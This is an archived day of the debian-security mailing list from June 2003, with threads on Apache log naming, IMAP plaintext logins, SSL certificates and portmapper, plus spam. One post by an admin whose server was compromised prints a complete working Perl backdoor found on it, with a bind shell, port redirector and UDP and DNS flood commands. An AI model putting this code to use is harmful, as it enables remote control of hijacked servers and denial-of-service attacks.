Bom dia debian-security

2003-06-10 Thread kandrak 


Message to [EMAIL PROTECTED] 

Ola
debian-security
GANHAMOS O PRÊMIO DE MELHOR SITE DO RAMO
==Estamos operando em Novo Formato==

Confira em:
 escuta21.kit.netou
http://www.escuta21.kit.net

ei debian-security
Cuidado com o que fala ao Celular...
ele tb tem ouvidos...

para remover o  [EMAIL PROTECTED] de nossa lista 
responda este e-mail e coloque remover
nos perdoe o transtorno...ok?

kandrak


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

IMAP is too secure...

2003-06-10 Thread Hobbs, Richard 
Helo,

I think my IMAP server has become too secure... I'm using the current
version of uw-imapd and libc-client2003debian, as listed in stable and
stable-proposed-updates.

I cannot log into my IMAP server any more... It keeps saying Invalid
password. I can only assume it's using password encryption, but I don't
know how to turn it off.

It was never turned on before, but since the upgrade I've een unable to
retrieve my mail through IMAP. It usually asks in the config whether I
want clear-text passwords enabled or not, but it wasn't an option this
time.

Any ideas? I really need to get at the mail.

Thanks in advance...

Hobbs.

--
Richard Hobbs [EMAIL PROTECTED]
http://mongeese.co.uk | http://unixforum.co.uk

There's only one way of life, and that's your own - The Levellers

Registered Linux User: 313906
_
Send all your jokes to [EMAIL PROTECTED] !!
To subscribe, email: [EMAIL PROTECTED]


smime.p7s
Description: S/MIME cryptographic signature

apache

2003-06-10 Thread Martynas Domarkas 
Hi. I would like to use date string in apache log file names. Is there a
way to use some directive in httpd.conf to be parsed as shell command
like `date +%Y%m%d` or some other way to solve the problem? I will use
logrotate mechanism of debian, and this date string could be used only
for file creation after apache process receives SIGUSR1.





-- 
Pagarbiai
IT sistem administratorius
Martynas Domarkas
tel.: +370 698 44331



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: apache

2003-06-10 Thread Jamie Heilman 
Martynas Domarkas wrote:
 Hi. I would like to use date string in apache log file names. Is there a
 way to use some directive in httpd.conf to be parsed as shell command
 like `date +%Y%m%d` or some other way to solve the problem? I will use
 logrotate mechanism of debian, and this date string could be used only
 for file creation after apache process receives SIGUSR1.

Grab the cronolog package, its easier and less intrusive.

-- 
Jamie Heilman   http://audible.transient.net/~jamie/
We must be born with an intuition of mortality.  Before we know the words
 for it, before we know there are words, out we come bloodied and squalling
 with the knowledge that for all the compasses in the world, there's only
 one direction, and time is its only measure.  -Rosencrantz


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: apache

2003-06-10 Thread Martynas Domarkas 
An, 2003-06-10 12:01, Jamie Heilman ra:
 Martynas Domarkas wrote:
  Hi. I would like to use date string in apache log file names. Is there a
  way to use some directive in httpd.conf to be parsed as shell command
  like `date +%Y%m%d` or some other way to solve the problem? I will use
  logrotate mechanism of debian, and this date string could be used only
  for file creation after apache process receives SIGUSR1.
 
 Grab the cronolog package, its easier and less intrusive.
 
 -- 
 Jamie Heilman   http://audible.transient.net/~jamie/
 We must be born with an intuition of mortality.  Before we know the words
  for it, before we know there are words, out we come bloodied and squalling
  with the knowledge that for all the compasses in the world, there's only
  one direction, and time is its only measure.-Rosencrantz


Thanks, but I realy do not like instalation of another packages. There
must be a way to do this with apache configuration.


-- 
Pagarbiai
IT sistem administratorius
Martynas Domarkas
tel.: +370 698 44331



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: apache

2003-06-10 Thread Teun Vink 
On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
[...]
 
 Thanks, but I realy do not like instalation of another packages. There
 must be a way to do this with apache configuration.

You could add a line to your /etc/logrotate.d/apache configuration, 
so it would look something like this:

[...]
   postrotate
  /etc/init.d/apache reload  /dev/null
  mv -f $1.0 $1.`date +%Y-%m-%d`
   endscript
[...]

This would rename access.log.0 to access.log.2003-06-10


Regards,


Teun Vink


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: apache

2003-06-10 Thread Martynas Domarkas 
An, 2003-06-10 12:56, Teun Vink ra:
 On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
 [...]
  
  Thanks, but I realy do not like instalation of another packages. There
  must be a way to do this with apache configuration.
 
 You could add a line to your /etc/logrotate.d/apache configuration, 
 so it would look something like this:
 
 [...]
postrotate
   /etc/init.d/apache reload  /dev/null
   mv -f $1.0 $1.`date +%Y-%m-%d`
endscript
 [...]
 
 This would rename access.log.0 to access.log.2003-06-10
 
 
 Regards,
 
 
 Teun Vink
 

Thanks a lot. This is nice solution, but I still like apache do the job,
and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have
seen somewhere some piece of shell command in httpd.conf.


-- 
Pagarbiai
IT sistem administratorius
Martynas Domarkas
tel.: +370 698 44331



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re[2]: apache

2003-06-10 Thread Dominik Schulz 
Perhaps I've got you wrong but wouldn't
--- snip ---
TransferLog | /usr/sbin/rotatelogs 
/var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800
--- end ---
do it?

Martynas Domarkas [EMAIL PROTECTED] wrote on 10 Jun 2003 13:02:55 +0300:

 An, 2003-06-10 12:56, Teun Vink raðë:
  On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
  [...]
   
   Thanks, but I realy do not like instalation of another packages. There
   must be a way to do this with apache configuration.
  
  You could add a line to your /etc/logrotate.d/apache configuration, 
  so it would look something like this:
  
  [...]
 postrotate
/etc/init.d/apache reload  /dev/null
mv -f $1.0 $1.`date +%Y-%m-%d`
 endscript
  [...]
  
  This would rename access.log.0 to access.log.2003-06-10
  
  
  Regards,
  
  
  Teun Vink
  
 
 Thanks a lot. This is nice solution, but I still like apache do the job,
 and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have
 seen somewhere some piece of shell command in httpd.conf.
 
 
 -- 
 Pagarbiai
 IT sistemø administratorius
 Martynas Domarkas
 tel.: +370 698 44331
 
 
 
 -- 
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Mit freundlichen Gruessen / Best regards
Dominik Schulz


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

RE: OPENSSL

2003-06-10 Thread Reckhard, Tobias 
 I'm trying to generate a 40-bit certificate using OPENSSL.Can 
 anybody tell me if this is possible and with which package?

The RSA keys used in X.509 certificates are typically 1024 or 2048 bits in
length. What length the symmetric key used between two parties that have
authenticated via X.509 certificates (with RSA keys) to subsequently protect
their communication has, is not directly related to the certificate.

There are web browsers that will negotiate 128 bits only if the certificate
presented by the web server is a step-up certificate. I'm not sure what
makes a certificate a step-up certificate, however, nor if this restriction
still applies to current browsers.

Cheers,
Tobias


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: OPENSSL

2003-06-10 Thread Berin Lautenbach 
Reckhard, Tobias wrote:
There are web browsers that will negotiate 128 bits only if the
certificate presented by the web server is a step-up certificate.
I'm not sure what makes a certificate a step-up certificate, however,
nor if this restriction still applies to current browsers.
The step up involved the browser checking the signer was a legitimate CA
to sign a step-up cert and then performing the re-negotiation. The
restriction disapeared when the crypto export laws were all relaxed. You
have to go a fair way back (few years) to get a browser that still only
supports 128bit symmetric in SGC mode.
Cheers,
Berin


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: Re[2]: apache

2003-06-10 Thread Martynas Domarkas 
An, 2003-06-10 13:46, Dominik Schulz ra: 
 Perhaps I've got you wrong but wouldn't
 --- snip ---
 TransferLog | /usr/sbin/rotatelogs 
 /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800
 --- end ---
 do it?
 
 Martynas Domarkas [EMAIL PROTECTED] wrote on 10 Jun 2003 13:02:55 +0300:
 
  An, 2003-06-10 12:56, Teun Vink ra:
   On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
   [...]

Thanks, but I realy do not like instalation of another packages. There
must be a way to do this with apache configuration.
   
   You could add a line to your /etc/logrotate.d/apache configuration, 
   so it would look something like this:
   
   [...]
  postrotate
 /etc/init.d/apache reload  /dev/null
 mv -f $1.0 $1.`date +%Y-%m-%d`
  endscript
   [...]
   
   This would rename access.log.0 to access.log.2003-06-10
   
   
   Regards,
   
   
   Teun Vink
   
  
  Thanks a lot. This is nice solution, but I still like apache do the job,
  and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have
  seen somewhere some piece of shell command in httpd.conf.
  
  
  -- 
  Pagarbiai
  IT sistem administratorius
  Martynas Domarkas
  tel.: +370 698 44331
  
  
  
  -- 
  To UNSUBSCRIBE, email to [EMAIL PROTECTED]
  with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
 
 
 Mit freundlichen Gruessen / Best regards
 Dominik Schulz
 

Yes, of course. But in this case I will invoke rotatelogs... I don't
like it.


-- 
Pagarbiai
IT sistem administratorius
Martynas Domarkas
tel.: +370 698 44331


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bom dia debian-securityESCUTA21 em Novo Formato

2003-06-10 Thread kandrak 


Message to [EMAIL PROTECTED] 

Ola
debian-security
GANHAMOS O PRÊMIO DE MELHOR SITE DO RAMO
==Estamos operando em Novo Formato==

Confira em:
 escuta21.kit.netou
http://www.escuta21.kit.net

ei debian-security
Cuidado com o que fala ao Celular...
ele tb tem ouvidos...

para remover o  [EMAIL PROTECTED] de nossa lista 
responda este e-mail e coloque remover
nos perdoe o transtorno...ok?

kandrak


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: IMAP is too secure...

2003-06-10 Thread Jelmer Barhorst 
Hi Richard,

Since libc-client2003debian it's only posible to use a SSL connection. Most
clients support it, but if you really want to allow plaintext IMAP again,
please run 'dpkg-reconfigure libc-client2003debian' and awnser Yes to
'Should plaintext passwords be enabled?'.

To enable it manualy, create  /etc/c-client.cf with the following contents:
--8--
I accept the risk
set disable-plaintext nil
--8--

A better sollution would be to set your client to use SSL on port 993. The
only thing you still have to worry about are the certificates.

Jelmer


- Original Message -
From: Hobbs, Richard [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, June 10, 2003 8:32 AM
Subject: IMAP is too secure...


 Helo,

 I think my IMAP server has become too secure... I'm using the current
 version of uw-imapd and libc-client2003debian, as listed in stable and
 stable-proposed-updates.

 I cannot log into my IMAP server any more... It keeps saying Invalid
 password. I can only assume it's using password encryption, but I don't
 know how to turn it off.

 It was never turned on before, but since the upgrade I've een unable to
 retrieve my mail through IMAP. It usually asks in the config whether I
 want clear-text passwords enabled or not, but it wasn't an option this
 time.

 Any ideas? I really need to get at the mail.

 Thanks in advance...

 Hobbs.

 --
 Richard Hobbs [EMAIL PROTECTED]
 http://mongeese.co.uk | http://unixforum.co.uk

 There's only one way of life, and that's your own - The Levellers

 Registered Linux User: 313906
 _
 Send all your jokes to [EMAIL PROTECTED] !!
 To subscribe, email: [EMAIL PROTECTED]



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Stefan Neufeind 
Thank you for the information. Am I right that php-skripts then would 
need an execute-bit set? Currently they don't have ...

On 9 Jun 2003 at 17:59, Jon wrote:

 On Mon, 2003-06-09 at 17:28, Phillip Hofmeister wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
  
  On Mon, 09 Jun 2003 at 09:35:49PM +0200, Stefan Neufeind wrote:
   But you mean starting with #! ?? How could I use the normal way of
   setting a cgi-handler for calling .php-files? Know what I mean?
   
   Using Misc Binary-support (and therefor patching the kernel) seems
   no solution to me. Isn't there some way to make it work using
   Apache- features?
  
  MISC Binary is not patching the kernel.  MISC Binary comes as an
  option with the stock kernel.  You might have to compile your own
  kernel (I don't know, I haven't used a stock Debian kernel in a VERY
  long time...)
  
 
 The binfmt_misc kernel module is included in the stock Debian kernels,
 AFAIK.  There is a nice package, binfmt-support (ala
 update-alternatives) that allows one to easily configure binfmt_misc:
 
 
 Package: binfmt-support
 Support for extra binary formats
 
 The binfmt_misc kernel module, contained in versions 2.1.43 and later
 of the Linux kernel, allows system administrators to register
 interpreters for various binary formats based on a magic number or
 their file extension, and cause the appropriate interpreter to be
 invoked whenever a matching file is executed. Think of it as a more
 flexible version of the #! executable interpreter mechanism.
 
 This package provides an 'update-binfmts' script with which package
 maintainers can register interpreters to be used with this module
 without having to worry about writing their own init.d scripts, and
 which sysadmins can use for a slightly higher-level interface to this
 module.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: OPENSSL

2003-06-10 Thread Stefan Neufeind 
I'm using a 128-bit-cert. But browsers that support less encryption 
(e.g. IE that comes with WinNT4) can't access my SSL-pages because 
the encryption doesn't allow degration. Is there any way to solve 
this prob? Using Apache with an official SSL-cert.

PS: This just came to my mind when you said step-up - cause in my 
case it would be a step-down, right?

On 10 Jun 2003 at 21:49, Berin Lautenbach wrote:

 Reckhard, Tobias wrote:
  There are web browsers that will negotiate 128 bits only if the
  certificate presented by the web server is a step-up certificate.
  I'm not sure what makes a certificate a step-up certificate,
  however, nor if this restriction still applies to current browsers.
 
 The step up involved the browser checking the signer was a legitimate
 CA to sign a step-up cert and then performing the re-negotiation. The
 restriction disapeared when the crypto export laws were all relaxed.
 You have to go a fair way back (few years) to get a browser that still
 only supports 128bit symmetric in SGC mode.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

re: strange broadcast packets

2003-06-10 Thread kuba . jakubik 
Hello,

isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to dhcp 
requests from clients?

Carpe Noctem,

Kuba BIGHard Jakubik

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

unsubscibe

2003-06-10 Thread loretta whitehead 
hi my name is loretta i got this really cool incredimail downloaded on my computer..but it does not work...I've tried every thing my email will come to the incredimail account but i can not respond so i don't want it any more can you please take it off so i can use my sbcglobal account again.I even had t sighn up for a new email address just so i could respond to some of my e mail.thats sad.PLEASE take it off 
Do you Yahoo!?
Free online calendar with sync to Outlook(TM).

Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Jon 
On Tue, 2003-06-10 at 08:24, Stefan Neufeind wrote:
 Thank you for the information. Am I right that php-skripts then would 
 need an execute-bit set? Currently they don't have ...
 

Unfortunately, yes.  Otherwise you'll get a 500 Internal Server Error or
the likes.  

- Jon

-- 
[EMAIL PROTECTED]

Administrator, tgpsolutions
http://www.tgpsolutions.com


signature.asc
Description: This is a digitally signed message part

Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Phillip Hofmeister 
On Tue, 10 Jun 2003 at 05:24:59PM +0200, Stefan Neufeind wrote:
 Thank you for the information. Am I right that php-skripts then would 
 need an execute-bit set? Currently they don't have ...
 

They will be being treated like a normal binary file, so yes (that is,
if you want yours scripts to work).  If on the other hand, you don't
want your sk|pt5 to work then you don't need to set the execute bit G.

-- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
--
Excuse #67: Typo in the code 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: nautilus and portmapper port 111

2003-06-10 Thread Andreas Wüst 
Hi Phillip

On Dienstag, 10-Jun-03 at 01:33:07, Phillip Hofmeister wrote:

 On Tue, 10 Jun 2003 at 12:20:10AM +0100, Andreas W?st wrote:
 Hi
 
 Although I can see no evidence for portmapper being run by issuing
 netstat -tu -l -ee -p, everytime nautilus is started it connects to
 port 111, and even gets an answer from there. And even after this
 connection, I can't see a server listening on port 111 via netstat.
 
 What is going on here? If I block port 111 nautilus wont start.
 
 How can I make sure portmapper is not being run, or at least only in
 a controlled manner, say for nautilus?
 
 
 I usually use a netstat -apn (requires r00t).  It will show you all
 sockets (listening or otherwise) and what app owns them.  The -n makes
 it so it does not resolve the port numbers via /etc/service.

No matter if I try netstat -apn or netstat -atunp as someone pointed out
in private, it gives the same result as netstat -tu -l -ee -p, apart
from the established connections, namely there is nothing listening in
port 111.

Furhtermore, package portmap is NOT installed, but there are working
connections via 111 when nautilus starts up..

-- 
Best wishes,
Andi


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: strange broadcast packets

2003-06-10 Thread Andreas Wüst 
Hi

 Hello,
 
 isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to
 dhcp requests from clients?

No lan here.. !!

-- 
Best wishes,
Andi


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: Re[2]: apache

2003-06-10 Thread Mark L. Kahnt 
On Tue, 2003-06-10 at 09:49, Martynas Domarkas wrote:
 An, 2003-06-10 13:46, Dominik Schulz ra: 
  Perhaps I've got you wrong but wouldn't
  --- snip ---
  TransferLog | /usr/sbin/rotatelogs 
  /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800
  --- end ---
  do it?
  
  Martynas Domarkas [EMAIL PROTECTED] wrote on 10 Jun 2003 13:02:55 +0300:
  
   An, 2003-06-10 12:56, Teun Vink ra:
On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
[...]
 
 Thanks, but I realy do not like instalation of another packages. There
 must be a way to do this with apache configuration.

You could add a line to your /etc/logrotate.d/apache configuration, 
so it would look something like this:

[...]
   postrotate
  /etc/init.d/apache reload  /dev/null
  mv -f $1.0 $1.`date +%Y-%m-%d`
   endscript
[...]

This would rename access.log.0 to access.log.2003-06-10


Regards,


Teun Vink

   
   Thanks a lot. This is nice solution, but I still like apache do the job,
   and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have
   seen somewhere some piece of shell command in httpd.conf.
   
   
   -- 
   Pagarbiai
   IT sistem administratorius
   Martynas Domarkas
   tel.: +370 698 44331
   
   
   
   -- 
   To UNSUBSCRIBE, email to [EMAIL PROTECTED]
   with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
  
  
  Mit freundlichen Gruessen / Best regards
  Dominik Schulz
  
 
 Yes, of course. But in this case I will invoke rotatelogs... I don't
 like it.
 
 
 -- 
 Pagarbiai
 IT sistem administratorius
 Martynas Domarkas
 tel.: +370 698 44331

IIUC, you are wanting to control the file name applied to rotated logs
from Apache, but you seem to be of the belief that Apache itself is
rotating the log files. Unless this has been added since I last read
through the the Apache configuration documentation, I don't remember
seeing the log rotation functionality being part of it (although I last
read through the documenttation in entirety several years back.) It is
handled by a separate package, on Debian most commonly logrotate,
regardless of the name applied to the rotated file.
-- 
Mark L. Kahnt, FLMI/M, ALHC, HIA, AIAA, ACS, MHP
ML Kahnt New Markets Consulting
Tel: (613) 531-8684 / (613) 539-0935
Email: [EMAIL PROTECTED]


signature.asc
Description: This is a digitally signed message part

Re: strange broadcast packets

2003-06-10 Thread Phillip Hofmeister 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas W?st wrote:
 Hi
 
  Hello,
  
  isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to
  dhcp requests from clients?
 
 No lan here.. !!

That IP address might be used by your cable modem service as an internal
management address to hand out IP addresses.  Or it might even be your
bridge (cable modem).  In either case.  This is not something to be
worried about.  In fact I made a special rule in my iptables so such
packets don't get logged.

Be well,

- -- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
- --
Excuse #34: Heavy gravity fluctuation move computer to floor rapidly 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQE+5iqFS3Jybf3L5MQRAvTTAJ9HjtzJ3VLuxePPG6Ph9ZOW9dYKgACfXpet
jjtqPu0j7Se0dWS2gwScG10=
=3kbY
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

unsubscribe

2003-06-10 Thread Johannes Kleinlercher 





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: nautilus and portmapper port 111

2003-06-10 Thread Chris Caldwell 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Andreas Wüst sent the following message Today:

AW  No matter if I try netstat -apn or netstat -atunp as someone pointed out
AW  in private, it gives the same result as netstat -tu -l -ee -p, apart
AW  from the established connections, namely there is nothing listening in
AW  port 111.

Have you tried rpcinfo -p localhost to see if Nautilus is
registering a connection to portmap? The newer Gnome installs
(gnomevfs) depend on fam, which depends on portmap. I don't
believe there is a direct dependency from core Nautilus to
portmap, but possibly some of the Nautilus extras or vfs extrase
are causing the dependency.

- -- 
Chris Caldwell

Information Systems Coordinator, Enterprise Systems
Information Systems and Services, The George Washington University
caldwell @ gwu . edu | +1 202.994.4674 (w) | +1 202.409.0878 (c)
http://asclepius.tops.gwu.edu | GPG key ID: 0xE52D0BE8

Formal education can rarely improve the character of a scoundrel.
- Derek Bok, Harvard University

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQE+5kId1YKAfuUtC+gRAiWJAJ9Cpr8WyWV061ppN9m6O1OXRmW9jwCfQHcl
AWB5FF7DcvK7wMCroRqdn5M=
=iqMD
-END PGP SIGNATURE-



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

a weird script worm uploaded via php with debian 3.0 ?

2003-06-10 Thread Robert Ebright 
Hello,
I logged in to my server today to find that
/usr/sbin/ncsd was running about 50 copies,
since I don't have BIND installed, obviously
something was up...they were also running with
the user www-data...
After a little bit of research I found a new
crontab entryFile: /tmp/crontab.LYukbF
0 * * * * /tmp/.nscdrecover

this starts at
auth.log.0:Jun  6 17:00:01 debian
PAM_unix[26934]: (cron) session opened for user
www-data by (uid=0)auth.log.0:Jun  6 17:00:02
debianPAM_unix[26934]: (cron) session closed for user
www-dataand runs every hour

and under SYSLOG it starts

syslog.3:Jun  6 16:27:27 debian crontab[26795]:
(www-data) LIST (www-data)syslog.3:Jun  6
16:27:28 debiancrontab[26798]:
(www-data) REPLACE (www-data)syslog.3:Jun  6
16:27:34debian crontab[26804]:
(www-data) LIST (www-data)syslog.3:Jun  6
16:27:34 debiancrontab[26807]:
(www-data) REPLACE (www-data)syslog.3:Jun  6
17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD
(/tmp/.nscdrecover)

so I found /tmp/.ncsdrecover and it looks like
some kind of port scanner/trojan

the contents are pasted below


#!/usr/bin/perl -w

$pass = J9YcGEyNypkzI;
$str = 'Mess with the best - die like a
rest!'x1337;
use IO::Socket;
use IO::Select;
use POSIX;

sub redir
{
my $port = shift;
my $dest = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
$sa = IO::Socket::INET-new( Proto = tcp,
Listen = 1, ReuseAddr = 1,   
LocalPort =$port) or exit;
$sin = $sa-accept or exit;
close($sa);
alarm 0;
$sout = IO::Socket::INET-new( Proto = tcp,
PeerAddr = $dest) or exit;$sin-autoflush(1);
$sout-autoflush(1);
$sel = IO::Select-new($sin, $sout);
while(@sock = $sel-can_read(180)) {
foreach $s(@sock) {
$buf = $s; exit unless($buf);
print $sout $buf if($s eq $sin);
print $sin $buf if($s eq $sout);
}}}

sub shell
{
my $port = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 1);
accept(X, S);
close(S);
alarm 0;
open STDIN, X;
open STDOUT, X;
open STDERR, X;
close X;
exec(/bin/sh);
}

sub udp
{
my $host = shift;
my $time = shift;
$sock = IO::Socket::INET-new(Proto =
'udp', PeerAddr = $host,
PeerPort = int(rand 65535))
or exit;   
$sock-autoflush(1);$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
print $sock $str while(1);
}
}

sub ddns
{
my $host = shift;
my $time = shift;
$sock = new IO::Socket::INET-new(Proto
= 'udp', PeerAddr = $host,
PeerPort = 53) or exit;
$sock-autoflush(1);
$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
while(1) {
my $s = int(rand(89)+10);
my $r1 = int(rand(89)+10);
my $r2 = int(rand(89)+10);
my $r3 = int(rand(89)+10);
my $r4 = int(rand(89)+10);
 
send($sock,$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01,0);}}

$0 = '/usr/sbin/nscd'.' 'x100;
exit if fork;
$SIG{ALRM} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';
$SIG{INT} = 'IGNORE';
$SIG{QUIT} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
open STDIN, /dev/null;
open STDOUT, /dev/null;
open STDERR, /dev/null;
POSIX::setsid();

$csock = IO::Socket::INET-new(Proto = 'udp',
LocalPort = 1337, ReuseAddr = 1) or
exit;while($string =$csock)
{
chop($string);
my ($pw, $cmd, $arg1, $arg2) = split 
, $string;next unless($cmd);
next unless($arg1);
next unless(crypt($pw, $pass) eq $pass);
if ($cmd eq ping) {
my $bsock =
IO::Socket::INET-new(Proto =
'udp', PeerAddr = $arg1,
  PeerPort = $arg2,
ReuseAddr = 1) or
next;   
print $bsockpong .`uname 
-mnrs`;
close $bsock;
} elsif ($cmd eq die) {
exit if(crypt($arg1, $pass) eq $pass);
} elsif ($cmd eq redir) {
redir($arg1, $arg2) unless(fork);
} elsif ($cmd eq shell) {
shell($arg1) unless(fork);
} elsif ($cmd eq udp) {
udp($arg1, $arg2) unless(fork);
} elsif ($cmd eq ddns) {
ddns($arg1, $arg2) unless(fork);
}
}



A little history is that my server was hacked
with some trojan that was sending out SPAM and I
did a fresh reinstall with debian so I could
have automatic updates and the like. I copied
over a few of the home directorys from the old
site.Then this all started after a user logged
in onFriday June 6th first login at 14:16 ending
14:24the script starts at 14:27


worldspe ftpd26405pm6-s104.amazon. Fri Jun
6 15:06 - 15:06  (00:00)worldspe ftpd26325
pm6-s104.amazon. Fri

Re: apache

2003-06-10 Thread Jamie Heilman 
Martynas Domarkas wrote:
 
 Thanks, but I realy do not like instalation of another packages. There
 must be a way to do this with apache configuration.

Martynas Domarkas wrote:
 
 Thanks a lot. This is nice solution, but I still like apache do the job,
 and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have
 seen somewhere some piece of shell command in httpd.conf.

Martynas Domarkas wrote:
 
 Yes, of course. But in this case I will invoke rotatelogs... I don't
 like it.

As, you've exhausted the other possibilites, why not
read the fine manual: http://httpd.apache.org/docs/logs.html

-- 
Jamie Heilman   http://audible.transient.net/~jamie/
Most people wouldn't know music if it came up and bit them on the ass.
-Frank Zappa


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

cronjob stuck

2003-06-10 Thread Dale Amon 
Just ran across an interesting prob, wondered if
anyone else has seen it. I added a repeating entry
to /etc/cron.d/foo that ran every */5 minutes. I
then tried to get rid of it... It will not die.

I moved the file out of /etc/cron.d and it still
is running.

I cp'd the file and deleted the old one in case
cron remembered the inode (rather a long shot).
No change.

I did /etc/init.d/cron stop; /etc/init.d/cron start;
still it repeats.

I did updatedb and locate cron; can't find it cached
anywhere.

cron doesn't seem to have any flush options and no
indication that it should be caching across executions.

I could certainly (I hope!) get rid of it by rebooting
but I can't do that with this system at this time.

Has anyone else had trouble making vixie cron STFU? Am
I hallucinating? Is my brain in need of Coke and MM's?

-- 
--
   IN MY NAME:Dale Amon, CEO/MD
  No Mushroom clouds over Islandone Society
London and New York.  www.islandone.org
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: nautilus and portmapper port 111

2003-06-10 Thread Andreas Wüst 
Hello Chris

Thank you for your answer!

On Dienstag, 10-Jun-03 at 21:39:47, Chris Caldwell wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Andreas Wüst sent the following message Today:
 
 No matter if I try netstat -apn or netstat -atunp as someone
 in private, it gives the same result as netstat -tu -l
 -ee -p, apart AW from the established connections, namely there is
 nothing listening in AW port 111.
 
 Have you tried rpcinfo -p localhost to see if Nautilus is
 registering a connection to portmap?

No, I haven't yet, but will do!

 The newer Gnome installs
 (gnomevfs) depend on fam, which depends on portmap.

Umm, I thouth woody gnome wouldn't depend on fam, no?

 I don't
